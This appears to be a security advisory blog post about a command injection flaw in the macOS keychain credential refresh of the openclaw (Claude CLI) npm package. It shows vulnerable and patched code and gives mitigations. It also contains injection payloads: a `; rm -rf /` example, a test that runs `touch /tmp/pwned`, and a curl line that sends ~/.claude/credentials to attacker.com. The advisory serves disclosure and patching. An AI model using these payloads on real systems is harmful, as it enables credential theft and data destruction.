Listen to this Post
The vulnerability resides in the credential refresh mechanism of Claude CLI on macOS. When refreshing OAuth tokens, the application constructs a shell command to update the keychain using the `security add-generic-password` command. Specifically, it builds a command string that includes the updated JSON blob containing OAuth tokens. Since these tokens are user-controlled data, an attacker could inject arbitrary shell commands by crafting malicious token values. The vulnerable code likely used a function like `exec` or `system` that invokes a shell, allowing command injection through shell metacharacters. For example, a token containing `; rm -rf /` would be interpreted as a separate command. The issue affects openclaw npm package versions <=2026.2.13 on macOS only. The fix replaces the shell invocation with execFileSync("security", argv), which passes arguments directly to the `security` binary without shell interpretation, thus preventing injection. The vulnerability was reported by @aether-ai-agent and fixed in PR 15924 with commits merged to main (9dce3d8, 66d7178, b908388). No CVE has been assigned at this time. The patch is available in version >=2026.2.14.
Platform: macOS
Version: <=2026.2.13
Vulnerability: No CVE assigned
Severity: High
date: 2026-02-13
Prediction: 2026-02-14
What Undercode Say:
Analytics show command injection flaws in macOS keychain integrations are often due to unsafe shell construction. The vulnerable code pattern:
const token = userSuppliedToken; // attacker-controlled
const cmd = <code>security add-generic-password -a claude -s claude-token -w '${token}'</code>;
exec(cmd, (err, stdout, stderr) => { ... });
The fix uses direct argument passing:
const token = userSuppliedToken;
const argv = ['add-generic-password', '-a', 'claude', '-s', 'claude-token', '-w', token];
execFileSync('security', argv);
Attackers can test with:
Simulate malicious token token="'; touch /tmp/pwned; '" Vulnerable command would become: security add-generic-password -a claude -s claude-token -w ''; touch /tmp/pwned; ''
Always avoid shell interpolation with user input.
Exploit:
An attacker controlling the OAuth token can inject arbitrary shell commands. Example payload: '; curl http://attacker.com/steal?data=$(cat ~/.claude/credentials); '. When the vulnerable CLI refreshes credentials, the injected command executes, exfiltrating sensitive data. The injection works because the shell interprets the semicolon as a command separator.
Protection from this CVE
1. Update openclaw to version >=2026.2.14 immediately.
- If patching is not possible, avoid using the affected credential refresh functionality on macOS.
- Implement input validation and sanitization for all user-controlled data used in system commands.
- Use parameterized APIs like `execFileSync` or `spawn` that do not invoke a shell.
Impact
Successful exploitation allows arbitrary command execution with the privileges of the user running Claude CLI. This can lead to full system compromise, including credential theft, data exfiltration, and installation of malware. The vulnerability is particularly critical because OAuth tokens are frequently refreshed, providing multiple exploitation opportunities.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

